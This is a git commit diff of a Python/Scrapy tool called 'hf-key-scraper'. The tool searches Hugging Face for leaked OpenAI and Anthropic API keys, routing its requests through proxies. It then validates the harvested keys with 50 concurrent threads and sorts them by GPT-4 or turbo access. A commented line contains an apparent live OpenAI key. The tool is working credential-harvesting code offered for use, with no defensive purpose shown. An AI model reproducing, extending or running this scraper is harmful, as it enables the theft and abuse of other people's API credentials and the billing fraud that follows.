final commit
This commit is contained in:
parent
15759586e4
commit
c13c224b36
|
@ -1,4 +1,6 @@
|
||||||
.idea
|
.idea
|
||||||
|
found-keys*.txt
|
||||||
|
|
||||||
|
|
||||||
# ---> Python
|
# ---> Python
|
||||||
# Byte-compiled / optimized / DLL files
|
# Byte-compiled / optimized / DLL files
|
||||||
|
|
|
@ -1,3 +1,5 @@
|
||||||
# hf-key-scraper
|
# hf-key-scraper
|
||||||
|
|
||||||
Scrape for OpenAI keys on Hugging Face
|
Scrape for OpenAI keys on Hugging Face.
|
||||||
|
|
||||||
|
This requires at least one Squid proxy to function. Define your proxies in `settings.py` -> `PROXIES`.
|
||||||
|
|
|
@ -1,8 +1,9 @@
|
||||||
import argparse
|
import argparse
|
||||||
import concurrent
|
|
||||||
from concurrent.futures import ThreadPoolExecutor
|
from concurrent.futures import ThreadPoolExecutor
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
|
from tqdm import tqdm
|
||||||
|
|
||||||
from keychecker.check import check_key
|
from keychecker.check import check_key
|
||||||
|
|
||||||
|
|
||||||
|
@ -17,26 +18,29 @@ def process_key(key):
|
||||||
|
|
||||||
def main():
|
def main():
|
||||||
parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
|
parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
|
||||||
parser.add_argument('input_file', help='Path to the file containing the keys.')
|
parser.add_argument('input_file', nargs='*', help='Path to the file containing the keys.')
|
||||||
args = parser.parse_args()
|
args = parser.parse_args()
|
||||||
|
|
||||||
input_file = Path(args.input_file).resolve().absolute()
|
keys = set()
|
||||||
|
for file in args.input_file:
|
||||||
|
input_file = Path(file).resolve().expanduser().absolute()
|
||||||
if not input_file.exists():
|
if not input_file.exists():
|
||||||
print('Input file does not exist:', input_file)
|
print('Input file does not exist:', input_file)
|
||||||
quit(1)
|
quit(1)
|
||||||
|
data = set(input_file.read_text().splitlines())
|
||||||
with open(input_file) as f:
|
keys = keys | data
|
||||||
content = set(f.read().splitlines())
|
|
||||||
|
|
||||||
# content = ['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']
|
# content = ['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']
|
||||||
|
|
||||||
|
print('Checking', len(keys), 'keys...')
|
||||||
|
|
||||||
gpt_4 = set()
|
gpt_4 = set()
|
||||||
gpt_4_32k = set()
|
gpt_4_32k = set()
|
||||||
gpt_3 = set()
|
gpt_3 = set()
|
||||||
|
pbar = tqdm(total=len(keys))
|
||||||
|
|
||||||
with ThreadPoolExecutor(max_workers=50) as executor:
|
with ThreadPoolExecutor(max_workers=50) as executor:
|
||||||
results = executor.map(process_key, content)
|
results = executor.map(process_key, keys)
|
||||||
for result in results:
|
for result in results:
|
||||||
if result is not None:
|
if result is not None:
|
||||||
if result['has_gpt_4']:
|
if result['has_gpt_4']:
|
||||||
|
@ -45,6 +49,8 @@ def main():
|
||||||
gpt_4_32k.add(result['api_key'])
|
gpt_4_32k.add(result['api_key'])
|
||||||
if result['has_only_turbo']:
|
if result['has_only_turbo']:
|
||||||
gpt_3.add(result['api_key'])
|
gpt_3.add(result['api_key'])
|
||||||
|
pbar.update(1)
|
||||||
|
pbar.close()
|
||||||
print('')
|
print('')
|
||||||
|
|
||||||
print('GPT4 KEYS:')
|
print('GPT4 KEYS:')
|
||||||
|
|
|
@ -92,10 +92,7 @@ TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
|
||||||
FEED_EXPORT_ENCODING = "utf-8"
|
FEED_EXPORT_ENCODING = "utf-8"
|
||||||
|
|
||||||
PROXIES = [
|
PROXIES = [
|
||||||
"http://172.0.4.7:3128",
|
"http://127.0.0.1:3128"
|
||||||
"http://172.0.4.8:3128",
|
|
||||||
"http://172.0.4.10:3128",
|
|
||||||
"http://172.0.4.12:3128",
|
|
||||||
]
|
]
|
||||||
|
|
||||||
LOG_LEVEL = 'CRITICAL'
|
LOG_LEVEL = 'CRITICAL'
|
||||||
|
|
|
@ -31,5 +31,5 @@ class HuggingfaceSpider(CrawlSpider):
|
||||||
text = response.text
|
text = response.text
|
||||||
matches = self.regex.findall(text)
|
matches = self.regex.findall(text)
|
||||||
if matches:
|
if matches:
|
||||||
self.logger.error(f"{matches}")
|
self.logger.debug(f"{matches}")
|
||||||
return FoundItem(url=response.url, matches=matches)
|
return FoundItem(url=response.url, matches=matches)
|
||||||
|
|
|
@ -4,14 +4,14 @@ import time
|
||||||
|
|
||||||
import coloredlogs
|
import coloredlogs
|
||||||
import scrapy
|
import scrapy
|
||||||
|
from string import ascii_lowercase, ascii_uppercase
|
||||||
from ..pipelines import FoundItem
|
from ..pipelines import FoundItem
|
||||||
|
|
||||||
|
|
||||||
class HFSearchSpider(scrapy.Spider):
|
class HFSearchSpider(scrapy.Spider):
|
||||||
name = "huggingface_search"
|
name = "huggingface_search"
|
||||||
allowed_domains = ["huggingface.co"]
|
allowed_domains = ["huggingface.co"]
|
||||||
start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
|
start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in [*ascii_lowercase, *ascii_uppercase, *range(10), 'etk', 'ant'] for j in range(10)]
|
||||||
logger = logging.getLogger('HFSearchSpider')
|
logger = logging.getLogger('HFSearchSpider')
|
||||||
logger.setLevel(logging.DEBUG)
|
logger.setLevel(logging.DEBUG)
|
||||||
coloredlogs.install(logger=logger, level=logging.DEBUG)
|
coloredlogs.install(logger=logger, level=logging.DEBUG)
|
||||||
|
@ -27,5 +27,5 @@ class HFSearchSpider(scrapy.Spider):
|
||||||
for key in keys:
|
for key in keys:
|
||||||
found_keys.add(''.join(key))
|
found_keys.add(''.join(key))
|
||||||
if len(found_keys):
|
if len(found_keys):
|
||||||
self.logger.error(f"{found_keys}")
|
self.logger.debug(f"{found_keys}")
|
||||||
yield FoundItem(url=response.url, matches=found_keys)
|
yield FoundItem(url=response.url, matches=found_keys)
|
||||||
|
|
Reference in New Issue